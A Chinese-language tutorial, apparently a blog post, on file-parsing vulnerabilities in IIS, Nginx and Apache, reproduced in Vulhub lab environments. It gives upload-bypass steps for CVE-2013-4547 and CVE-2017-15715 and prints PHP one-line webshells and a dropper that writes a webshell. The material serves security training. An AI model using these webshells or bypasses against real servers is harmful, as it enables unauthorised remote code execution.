中间件解析了漏洞【IIS Nginx Apache】

IIS

1.IIS6.X

1.使用Windows2003虚拟机,在其中安装IIS6.X

2.在IIS6.X中,.asp文件夹中的文件都会被当作asp文件去执行

我们在网站根目录创建一个x.asp文件

在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。

在外部浏览器中访问windows2003的iis网站中的2.jpg 发现asp代码被执行

2.IIS7.X

1.php.ini⾥的cgi.fix_pathinfo=1 开启,把前面的分号去掉就算开启了

2.IIS7在Fast-CGI运⾏模式下

3.将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问

4.蚁剑连接

Nginx

1.nginx_parsing

1.在kali中开启vluhub靶场

在vluhub中找到Nginx中的靶场,运行docker-compose文件就是开启靶场

docker-compose up -d

2.运行docker-compose ps -a查看进程

3.访问

4.制作图片马进行上传,并获取木马地址

GIF89a是图片标识,如果不加会导致网站不认可我们的jpg文件

注意:cmd要加上引号

5.访问我们的图片马

访问不到我们的一句话木马,那么我们就要在目录后面加上.php让网站将我们的文件进行php解析

6.蚁剑连接

2.CVE-2013-4547

1.开启环境,同上

2.访问靶机

3.上传文件shell.php,抓包,将php改为jpg并在jpg后面加上两个空格和.php

4.在Hex中将第二个空格改为00

5.放行,上传成功

6.访问这个shell.jpg并进行抓包,将get后面参数加上两个空格,和.php

7.在hex中依旧将第二个空格改为00

Apache

1.apache_parsing

1.开启靶机

2.访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a

<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

3.蚁剑连接

2.CVE-2017-15715

1。开启靶机

2.访问靶机并上传 shell.jpg 文件,文件内容为GIF89a

<?php @eval($_POST['cmd']);?>,filename为1.php

3.抓包,在php后面加上空格,并把hex中的空格改为0a

4.放行访问1.php%0A

5,蚁剑连接

相关推荐
TsengOnce1 小时前
Docker 安装 禅道-21.2版本-外部数据库模式
运维·docker·容器
永卿0011 小时前
nginx学习总结(不包含安装过程)
运维·nginx·负载均衡
Stark、1 小时前
【Linux】文件IO--fcntl/lseek/阻塞与非阻塞/文件偏移
linux·运维·服务器·c语言·后端
人类群星闪耀时2 小时前
大模型技术优化负载均衡:AI驱动的智能化运维
运维·人工智能·负载均衡
新时代农民工--小明2 小时前
前端自动化部署更新,自动化打包部署
运维·前端·自动化
一个不秃头的 程序员3 小时前
服务器上加入SFTP------(小白篇 1)
运维·服务器
fnd_LN3 小时前
Linux文件目录 --- 复制命令CP、递归复制目录、软连接、硬链接
linux·运维·服务器
MorleyOlsen3 小时前
【Trick】解决服务器cuda报错——RuntimeError: cuDNN error: CUDNN_STATUS_NOT_INITIALIZED
运维·服务器·深度学习
周周的奇妙编程3 小时前
基于鲲鹏服务器的打砖块小游戏部署
运维·服务器
大熊程序猿3 小时前
airflow docker 安装
运维·docker·容器